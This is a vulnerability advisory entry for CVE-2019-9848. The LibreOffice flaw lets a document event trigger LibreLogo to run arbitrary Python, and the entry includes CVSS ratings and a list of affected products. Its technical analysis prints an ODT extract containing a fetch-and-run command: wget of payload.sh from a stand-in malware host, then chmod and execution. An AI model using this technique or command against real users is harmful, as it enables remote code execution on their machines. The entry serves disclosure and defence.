Attacker Value
Very Low
(1 user assessed)
Exploitability
Moderate
(1 user assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network

CVE-2019-9848

Disclosure Date: July 17, 2019

Description

LibreOffice has a feature where documents can specify that pre-installed scripts can be executed on various document events such as mouse-over, etc. LibreOffice is typically also bundled with LibreLogo, a programmable turtle vector graphics script, which can be manipulated into executing arbitrary python commands. By using the document event feature to trigger LibreLogo to execute python contained within a document a malicious document could be constructed which would execute arbitrary python commands silently without warning. In the fixed versions, LibreLogo cannot be called from a document event handler. This issue affects: Document Foundation LibreOffice versions prior to 6.2.5.

Ratings
  • Attacker Value
    Very Low
  • Exploitability
    Medium
Technical Analysis

This forms the basis of a social engineering attack. It requires LibreOffice and Python installed. This means it is a limited pool of target victims. However, this is a common setup on Linux desktop environments, which may make developers a target.

To exploit this vulnerability, an attacker creates a document with a text-written command and a hyperlink that, upon user mouseover, runs a program through the LibreLogo extension. When a user loads up the document in a program such as LibreOffice Writer, the macro is enabled automatically.

The hyperlink is set to include the macro LibreLogo:run. This in turn runs the previous text command through LibreLogo as if it’s attempting to use the information to create turtle vector graphics. This causes whatever is being called in the text command to run – be it malware, a program, or a malicious file download.

An example extract from an ODT file can be seen below:

   <txt ptr="0x4e9a180" id="3" symbol="11SwTextFrame" next="10" upper="2" txtNodeIndex="9">
    <infos>
     <bounds left="8181" top="1418" width="9638" height="299" mbFixSize="false" mbValidPos="true" mbValidSize="true" mbValidPrtArea="true"/>
     <prtBounds left="0" top="0" width="9638" height="299"/>
    </infos>
import os    <Text nLength="9" nType="POR_PARA" nHeight="299" nWidth="989" Portion="import os"/>
    <LineBreak nWidth="989" Line="import os"/>
    <Finish/>
   </txt>
   <txt ptr="0x7c6e450" id="10" symbol="11SwTextFrame" next="15" prev="3" upper="2" txtNodeIndex="10">
    <infos>
     <bounds left="8181" top="1717" width="9638" height="598" mbFixSize="false" mbValidPos="true" mbValidSize="true" mbValidPrtArea="true"/>
     <prtBounds left="0" top="0" width="9638" height="598"/>
    </infos>
os.system(“wget http://immersivemalware.bad:8001/payload.sh ; chmod +x payload.sh ; ./payload.sh”)    <Text nLength="84" nType="POR_PARA" nHeight="299" nWidth="9264" Portion="os.system(&#x201C;wget http://malware.bad:8001/payload.sh ; chmod +x payload.sh ; "/>
    <LineBreak nWidth="9264" Line="os.system(&#x201C;wget http://malware.bad:8001/payload.sh ; chmod +x payload.sh ; "/>
    <Text nLength="14" nType="POR_LAY" nHeight="299" nWidth="1458" Portion="./payload.sh&#x201D;)"/>
    <LineBreak nWidth="1458" Line="./payload.sh&#x201D;)"/>
    <Finish/>
   </txt>
   <txt ptr="0x4e2ac00" id="15" symbol="11SwTextFrame" prev="10" upper="2" txtNodeIndex="11">
    <infos>
     <bounds left="8181" top="2315" width="9638" height="299" mbFixSize="false" mbValidPos="true" mbValidSize="true" mbValidPrtArea="true"/>
     <prtBounds left="0" top="0" width="9638" height="299"/>
    </infos>
Run    <Text nLength="3" nType="POR_PARA" nHeight="299" nWidth="434" Portion="Run"/>
    <LineBreak nWidth="434" Line="Run"/>
    <Finish/>
   </txt>
CVSS V3 Severity and Metrics
Base Score: 9.8 Critical
Impact Score: 5.9
Exploitability Score: 3.9
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

General Information

Vendors

  • canonical
  • debian
  • fedoraproject
  • libreoffice
  • opensuse

Products

  • debian linux 8.0
  • fedora 29
  • fedora 30
  • leap 15.0
  • leap 15.1
  • libreoffice
  • ubuntu linux 16.04
  • ubuntu linux 18.04
  • ubuntu linux 19.04